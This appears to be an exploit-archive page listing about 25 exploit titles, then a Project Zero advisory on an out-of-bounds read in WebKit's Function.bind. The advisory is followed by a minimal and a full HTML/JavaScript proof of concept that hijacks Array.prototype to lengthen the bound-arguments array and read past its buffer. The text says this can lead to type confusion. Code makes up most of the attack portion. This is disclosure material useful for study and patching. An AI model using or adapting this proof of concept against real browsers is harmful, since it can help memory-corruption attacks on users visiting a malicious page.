1f8c35c0c0
25 new exploits Samba < 3.6.2 (x86) - Denial of Serviec (PoC) Samba < 3.6.2 (x86) - Denial of Service (PoC) Microsoft Visual Studio 2015 update 3 - Denial of Service Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow Apple Safari - 'DateTimeFormat.format' Type Confusion Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode Apple Safari - Out-of-Bounds Read when Calling Bound Function QNAP QTS < 4.2.4 - Domain Privilege Escalation Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory Github Enterprise - Default Session Secret And Deserialization (Metasploit) B2B Alibaba Clone Script - SQL Injection B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection Just Another Video Script 1.4.3 - SQL Injection Adult Tube Video Script - SQL Injection Alibaba Clone Script - SQL Injection B2B Marketplace Script 2.0 - SQL Injection Php Real Estate Property Script - SQL Injection Courier Tracking Software 6.0 - SQL Injection Parcel Delivery Booking Script 1.0 - SQL Injection Delux Same Day Delivery Script 1.0 - SQL Injection Hotel Booking Script 1.0 - SQL Injection Tour Package Booking 1.0 - SQL Injection Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection CouponPHP CMS 3.1 - 'code' Parameter SQL Injection EyesOfNetwork (EON) 5.0 - Remote Code Execution EyesOfNetwork (EON) 5.0 - SQL Injection Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit) inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
70 lines
1.8 KiB
HTML
Executable file
70 lines
1.8 KiB
HTML
Executable file
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1033
|
|
|
|
There is an out-of-bounds read when reading the bound arguments array of a bound function. When Function.bind is called, the arguments to the call are transferred to an Array before they are passed to JSBoundFunction::JSBoundFunction. Since it is possible that the Array prototype has had a setter added to it, it is possible for user script to obtain a reference to this Array, and alter it so that the length is longer than the backing native butterfly array. Then when boundFunctionCall attempts to copy this array to the call parameters, it assumes the length is not longer than the allocated array (which would be true if it wasn't altered), and reads out of bounds.
|
|
|
|
This is likely exploitable, because the read values are treated as JSValues, so this issue can allow type confusion if the attacker controls any of the unallocated values that are read.
|
|
|
|
This issue is only in WebKit trunk and Safari preview, it hasn't made it to regular Safari releases yet.
|
|
|
|
|
|
A minimal PoC is as follows, and a full PoC is attached.
|
|
|
|
|
|
var ba;
|
|
|
|
function s(){
|
|
ba = this;
|
|
}
|
|
|
|
|
|
function dummy(){
|
|
alert("just a function");
|
|
}
|
|
|
|
|
|
Object.defineProperty(Array.prototype, "0", {set : s });
|
|
var f = dummy.bind({}, 1, 2, 3, 4);
|
|
ba.length = 100000;
|
|
f(1, 2, 3);
|
|
-->
|
|
|
|
<html>
|
|
<body>
|
|
<script>
|
|
|
|
var ba;
|
|
|
|
function s(){
|
|
alert("in s");
|
|
ba = this;
|
|
}
|
|
|
|
|
|
function g(){
|
|
alert("in g");
|
|
return 7;
|
|
}
|
|
|
|
|
|
function dummy(){
|
|
alert("just a function");
|
|
}
|
|
|
|
alert("start");
|
|
|
|
try{
|
|
Object.defineProperty(Array.prototype, "0", {set : s, get : g});
|
|
var f = dummy.bind({}, 1, 2, 3, 4);
|
|
alert("ba" + ba);
|
|
ba.length = 100000;
|
|
f(1, 2, 3);
|
|
}catch(e){
|
|
|
|
alert(e.message);
|
|
|
|
}
|
|
|
|
</script>
|
|
</body>
|
|
</html>
|